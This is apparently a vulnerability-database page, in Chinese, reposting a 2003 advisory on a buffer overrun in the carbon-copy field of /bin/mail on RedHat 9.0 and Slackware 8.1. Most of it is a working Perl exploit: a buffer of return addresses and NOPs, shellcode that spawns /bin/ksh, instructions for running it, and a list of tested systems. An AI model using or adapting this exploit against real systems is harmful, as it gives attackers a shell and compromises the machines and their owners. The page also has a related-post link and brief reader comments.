RedHat 9.0 / Slackware 8.1 – ‘/bin/mail’ Carbon Copy Field Buffer Overrun
漏洞ID | 1053913 | 漏洞类型 | |
发布时间 | 2003-05-30 | 更新时间 | 2003-05-30 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7760/info
A vulnerability has been discovered in the Linux /bin/mail utility. The problem occurs when processing excessive data within the carbon copy field. Due to insufficient bounds checking while parsing this information it may be possible to trigger a buffer overrun.
An attacker could exploit this issue to execute arbitrary commands. It should be noted that local exploitation may be inconsequential, however a malicious e-mail message or CGI interface could be a sufficient conduit for remote exploitation.
#!/usr/bin/perl
#
#
# Released under the GPL by a bored Vulndev member
# email: [email protected]
#
# The User 'cannot have expectations of privacy'.
#
# For the Script to work you will need to:
# Run it, press 'return' once, then '.' then 'return'
#result = Shell (if you have /bin/ksh!)
#
# Anything you do with this script is your own problem,
# dont forget if you print it off, recycle!
# if you dont print it off, do so anyway
# and use if for expensive toilet paper.
#
# Systems Tested on: (Please let me know the outcome of your own box)
# Redhat 9.0 -- Vulnerable
# Redhat 9.0 with St Jude and St Michael -- Not Vulnerable
# Slackware 8.1 -- Vulnerable
# Slackware 9.0 -- Not Vulnerable
# Debian 3.0 (Testing) -- May be vulnerable.. needing comfirmation.
$shellcode =
"xebx1fx5fx89xfcx66xf7xd4x31xc0x8ax07".
"x47x57xaex75xfdx88x67xffx48x75xf6x5b".
"x53x50x5ax89xe1xb0x0bxcdx80xe8xdcxff".
"xffxffx01x2fx62x69x6ex2fx6bx73x68x01".
"";
$ret = 0xbffff714;
$buf = 8232;
$egg = 9000;
$nop = "x90";
$offset = 0;
if (@ARGV == 1)
{
$offset = $ARGV[0];
}
$addr = pack('l',($ret + $offset));
for ($i = 0; $i < $buf; $i += 4)
{
$buffer .= $addr;
}
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++)
{
$buffer .= $nop;
}
$buffer .= $shellcode;
exec("mail",'-s','Test','-c',$buffer,'root@localhost');
sendkeys("{CR}");
sendkeys(".");
相关推荐: Simple Chat 1.x – User Information Disclosure
Simple Chat 1.x – User Information Disclosure 漏洞ID 1053776 漏洞类型 发布时间 2003-03-21 更新时间 2003-03-21 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Multip…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666